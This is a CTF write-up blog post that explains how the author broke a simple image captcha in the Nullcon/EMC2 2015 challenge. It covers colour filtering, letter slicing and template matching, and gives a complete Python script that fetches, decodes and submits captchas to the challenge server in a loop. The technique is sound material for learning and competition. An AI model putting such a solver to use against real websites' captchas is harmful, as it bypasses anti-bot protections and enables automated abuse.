Cracking a Captcha: Nullcon | EMC2 CTF 2015
Posted 01-15-2015 at 05:01 PM
Last week the EMC2/Nullcon CTF wrapped up. Even though I really wanted to, I did not have enough time to play the CTF. I was, and still am, busy working on my "Hacking Drones" research for Nullcon.
http://nullcon.net/website/goa-15/sp...rahul-sasi.php
Last year I was one of the top 30 finalists of the EMC2 Defenders League and stood 5th in the final ranking.
https://www.facebook.com/photo.php?f...type=1&theater
https://twitter.com/varunsharma14/st...65888308039680
Anyway, on Sunday night I got a bit bored with drones and decided to take a sneak peek at the CTF, but by that time the winners had been declared and the scoreboard was closed. I went straight to my favorite categories, web and reversing, and decided to solve one of those challenges. Web 5 was a captcha solver worth 500 points, and I decided that would be easy.
The challenge was to break as many captchas as possible and submit the solutions using a given session token within a time frame of 2 minutes.
Analyzing the captcha, we can easily see that there are 5 clearly visible colours.
Black == background
Dark violet == dots
Gray == lines
Light violet shades == letters
From the look of it, it was an easily crackable captcha.
This is a small AI problem where we need to create a program that can recognize these captchas. We need to teach our program what is right and what is wrong. So the first step is to build a training data set that serves as the input for our captcha solver. People choose different methods for this, relying on neural networks, vector space search, etc. In our situation the data set is not complicated: the captcha is simple and contains only letters [a-z, A-Z].
Building the Training Data set.
Step 1:
The captcha image we were provided was a PNG file in RGBA mode [Red Green Blue Alpha] (ref: en.wikipedia.org/wiki/RGBA_color_space). We have to bring it down to a palette of at most 256 colours. The easiest way to do that is to convert the image to palette mode ("P"), the mode GIF files use. We will use the Python PIL module to do that.
"
captcha_image = captcha_image.convert("P")
"
The next step is to find the image's pixel concentration: list each colour together with its pixel count.
We can use PIL's histogram() for this, and we get the following.
[-] Image pixel concentration
0 8344
190 938
53 301
96 184
204 113
205 69
60 24
210 14
211 7
95 4
Here 0 stands for black and has the highest pixel count, 8344, followed by colour 190. At this point I assumed colours 204 and 205 are the ones used for the captcha letters.
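As a rough illustration of the colour count above, here is a minimal sketch written for Python 3. It works on a plain list of rows of palette indices instead of a PIL image so that it runs without extra packages. The function name `top_colours` and the tiny sample image are made up for this example and are not part of the original script.

```python
from collections import Counter

def top_colours(pixels, n=10):
    """Return the n most common palette indices with their pixel counts."""
    counts = Counter(value for row in pixels for value in row)
    return counts.most_common(n)

# Tiny hypothetical 3x4 "image" of palette indices (not the real captcha).
sample = [
    [0, 0, 190, 0],
    [0, 204, 204, 0],
    [0, 205, 0, 0],
]

for colour, count in top_colours(sample, 2):
    print(colour, count)
```

The background dominates the count just as colour 0 does in the real captcha, which is what makes the rarer letter colours easy to pick out.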
Step 2:
Remove the noise from the image. This is easy to do, as we can simply drop every pixel that is not used for the captcha letters.
Simply plot the captcha letter colours onto a new image and leave everything else out.
if pix == 204 or pix == 205: # these are the letter colours to keep
    captcha_filtered.putpixel((y,x),0)
Now we get an image with a white background, black letters and all the noise removed.
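The filtering step can be sketched on its own as follows. This is a simplified Python 3 version that uses a list of rows instead of a PIL image. The names `filter_noise`, `LETTER_COLOURS`, `BACKGROUND` and `INK` are assumptions introduced for this example; the values 204, 205, 255 and 0 come from the text and the script.

```python
LETTER_COLOURS = {204, 205}   # palette indices assumed to belong to the letters
BACKGROUND, INK = 255, 0      # white background, black letter pixels

def filter_noise(pixels, keep=LETTER_COLOURS):
    """Map letter-coloured pixels to INK and everything else to BACKGROUND."""
    return [[INK if value in keep else BACKGROUND for value in row]
            for row in pixels]

# Hypothetical 2x3 image: dots (190), lines (53, 96) and letter pixels (204, 205).
noisy = [
    [0, 190, 204],
    [205, 53, 96],
]
print(filter_noise(noisy))
```

Anything that is not a letter colour, including the black background itself, ends up as 255, so the result has only two values.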
Step 3:
The next step is to find the captcha letter spacing and slice each character out of the captcha.
This is easy, as the new image contains only two values: 255 for the background and 0 for the letter pixels (originally colours 204 and 205).
Horizontal positions where letters start and stop:
|a|s|d|f|e
Image 1 Line Spacing is [(5, 13), (35, 43), (65, 73), (95, 102), (125, 133), (155, 163)]
Image 2 Line Spacing is [(5, 13), (35, 43), (66, 73), (96, 102), (125, 133), (155, 163)]
Each letter in the captcha occupies almost the same space.
Cut out each character and place the pieces inside a folder.
Rename each letter image (its file name) to its respective letter.
Now we have a folder of sliced letters, each named after the letter it shows.
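The column scan used for slicing can be sketched like this, again in Python 3 on a list of rows rather than a PIL image. The helper names `find_letter_spans` and `crop_columns` are hypothetical. Unlike the original loop, this sketch also closes a letter that touches the right edge of the image, which is an addition of mine.

```python
def find_letter_spans(pixels, background=255):
    """Return (start, end) column pairs for each run of columns containing ink."""
    width = len(pixels[0])
    spans = []
    start = None
    for col in range(width):
        has_ink = any(row[col] != background for row in pixels)
        if has_ink and start is None:
            start = col                  # first inked column of a letter
        elif not has_ink and start is not None:
            spans.append((start, col))   # first blank column after a letter
            start = None
    if start is not None:                # letter runs up to the right edge
        spans.append((start, width))
    return spans

def crop_columns(pixels, span):
    """Cut the columns start..end-1 out of every row."""
    start, end = span
    return [row[start:end] for row in pixels]

B = 255
image = [
    [B, 0, 0, B, B, 0, B],
    [B, 0, B, B, B, 0, B],
]
spans = find_letter_spans(image)
print(spans)
print([crop_columns(image, span) for span in spans])
```

Each cropped piece would then be saved and named by hand to build the letter folder.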
Final solution algorithm:
The final algorithm to solve the captcha would be:
a) Read a new captcha and the session cookie
b) Filter the noise out
c) Slice the filtered captcha and extract each letter
d) Compare each letter with the samples kept in the letter folder and find the best match
e) The best match is the captcha letter
f) Continue for all letters in the captcha
g) Submit the full captcha along with the session cookie to the application
h) Fetch a new captcha with the session cookie and go to step b
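The loop above can be sketched as a small driver, shown here in Python 3. The `fetch`, `solve` and `submit` callables are placeholders for the network and image steps, and the 120 second budget mirrors the 2 minute window of the challenge. The function name `run_solver` and all of its parameters are assumptions for illustration, not part of the original script.

```python
import time

def run_solver(fetch, solve, submit, time_limit=120.0, max_attempts=500,
               clock=time.monotonic):
    """Fetch, solve and submit captchas until time or attempts run out.

    Returns the number of submissions that submit() reported as accepted.
    """
    deadline = clock() + time_limit
    accepted = 0
    for _ in range(max_attempts):
        if clock() >= deadline:
            break
        image = fetch()          # steps a / h: get a captcha
        answer = solve(image)    # steps b to f: filter, slice, match
        if submit(answer):       # step g: send the answer back
            accepted += 1
    return accepted

# Stand-in callables so the sketch runs without a server.
fake_images = iter(["abc", "def", "ghi"])
result = run_solver(lambda: next(fake_images),
                    lambda img: img.upper(),
                    lambda ans: ans != "DEF",
                    max_attempts=3)
print(result)
```

Passing the steps in as functions keeps the timing logic separate from the captcha-specific code.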
Compare two images in Python:
There are multiple ways to compare images in Python.
1) Calculate the root mean square
ref: http://code.activestate.com/recipes/...ng-two-images/
2) Euclidean distance
3) Normalized cross-correlation
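We will choose a simplified stand-in for normalized cross-correlation: the sum of the absolute pixel differences, where the sample with the lowest sum is the best match.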
PIL's ImageChops.difference returns the absolute value of the pixel-by-pixel difference between the two images.
ImageChops.difference(image1, image2) ⇒ image
out = abs(image1 - image2)
Our images have the same shape and size, so this is the best bet.
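To make the comparison concrete, here is a minimal Python 3 sketch of two of the scores mentioned above, working on equally sized lists of rows of grayscale values. The names `sum_abs_diff`, `rms_diff` and `best_match`, and the tiny sample glyphs, are made up for this example.

```python
import math

def sum_abs_diff(a, b):
    """Sum of absolute pixel differences between two same-sized images."""
    return sum(abs(pa - pb)
               for row_a, row_b in zip(a, b)
               for pa, pb in zip(row_a, row_b))

def rms_diff(a, b):
    """Root mean square of the pixel differences."""
    count = sum(len(row) for row in a)
    squares = sum((pa - pb) ** 2
                  for row_a, row_b in zip(a, b)
                  for pa, pb in zip(row_a, row_b))
    return math.sqrt(squares / count)

def best_match(glyph, samples):
    """Return the label of the sample with the smallest difference sum."""
    return min(samples, key=lambda name: sum_abs_diff(glyph, samples[name]))

# Hypothetical 2x2 "letters"; real samples would be the sliced letter images.
samples = {
    "a": [[0, 255], [255, 0]],
    "b": [[0, 0], [0, 0]],
}
glyph = [[0, 255], [255, 255]]
print(best_match(glyph, samples))
```

A lower score means a closer match, so the label with the minimum score is taken as the decoded letter.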
My program had a 97% success rate, and after 50 successful entries I got the flag.
Python code:
from PIL import Image, ImageChops
from operator import itemgetter
import urllib2, hashlib, time, urllib
import cStringIO, glob

# All the labelled sample letters are kept in this folder.
files_names = glob.glob("/root/ctf/let/*.*")


class Fit:
    # Holds a candidate sample path and its accumulated pixel difference.
    letter = None
    difference = 0


# Fetch the captcha once to get the session cookie, then reuse that cookie
# for every captcha request and every submission.
response = urllib2.urlopen('http://54.165.191.231/imagedemo.php')
cookie = response.headers['Set-Cookie']
#print cookie

# Fetch, solve and submit captchas in a loop (range(1, 500) gives 499 rounds).
for attempt in range(1, 500):
    captcha = ""
    opener = urllib2.build_opener()
    opener.addheaders = [
        ('Accept', 'application/json, text/javascript, */*; q=0.01'),
        ('Referer', 'http://www.garag4hackers.com'),
        ('Cookie', cookie),
    ]
    response = opener.open('http://54.165.191.231/imagedemo.php')
    length = response.headers['content-length']
    # Read the captcha; the filtered copy is saved under its content length.
    print "[-] Image Content length ", length
    image_read = response.read()
    # cStringIO creates a file-like object from memory.
    #image_read = Image.open("/root/ctf/u.png")
    image_read = cStringIO.StringIO(image_read)
    captcha_image = Image.open(image_read)
    #im = Image.open("/root/ctf/de")
    captcha_image = captcha_image.convert("P")
    temp = {}
    captcha_filtered = Image.new("P", captcha_image.size, 255)
    #print im.histogram()
    his = captcha_image.histogram()
    values = {}
    for i in range(256):
        values[i] = his[i]
    print "[-] Image pixel concentration \n"
    for color, concentrate in sorted(values.items(), key=itemgetter(1), reverse=True)[:10]:
        print color, concentrate

    # Copy only the letter colours onto the white image (y = column, x = row).
    for x in range(captcha_image.size[1]):
        for y in range(captcha_image.size[0]):
            pix = captcha_image.getpixel((y, x))
            temp[pix] = pix
            if pix == 204 or pix == 205:  # these are the letter colours to keep
                captcha_filtered.putpixel((y, x), 0)
    captcha_filtered.save("/root/ctf/images/" + length + ".gif")

    # Scan column by column to find where each letter starts and stops.
    inletter = False
    foundletter = False
    start = 0
    end = 0
    letters = []
    for y in range(captcha_filtered.size[0]):  # slice across
        for x in range(captcha_filtered.size[1]):  # slice down
            pix = captcha_filtered.getpixel((y, x))
            if pix != 255:
                inletter = True
        if foundletter == False and inletter == True:
            foundletter = True
            start = y
        if foundletter == True and inletter == False:
            foundletter = False
            end = y
            letters.append((start, end))
        inletter = False
    print "[-] Horizontal Position Where letter start and stop \n"
    print letters
    print "\n"

    count = 0
    for letter in letters:
        m = hashlib.md5()
        im3 = captcha_filtered.crop((letter[0], 0, letter[1], captcha_filtered.size[1]))
        # Uncomment the next line to save slices when building the sample folder.
        #im3.save("/root/ctf/let/%s.gif"%(m.hexdigest()),quality=95)
        count += 1
        base = im3.convert('L')
        #print files_names
        # Match the current letter against every sample and keep the closest.
        best = Fit()
        for sample_path in files_names:
            current = Fit()
            current.letter = sample_path
            #print sample_path
            sample = Image.open(sample_path).convert('L').resize(base.size)
            difference = ImageChops.difference(base, sample)
            for x in range(difference.size[0]):
                for y in range(difference.size[1]):
                    current.difference += difference.getpixel((x, y))
            if not best.letter or best.difference > current.difference:
                best = current
        # The sample file name starts with its letter; "/root/ctf/let/" is 14 characters.
        tmp = best.letter[14:15]
        captcha = captcha + tmp

    # Post the decoded captcha to the server along with the session cookie.
    print "[+] Captcha is ", captcha
    url = 'http://54.165.191.231/verify.php'
    data = urllib.urlencode({'solution': captcha.strip(), 'Submit': 'Submit'})
    req = opener.open(url, data)
    response = req.read()
    print response
GitHub Code: https://github.com/fb1h2s/captcha-cracker
Ref: http://www.boyter.org/decoding-captchas/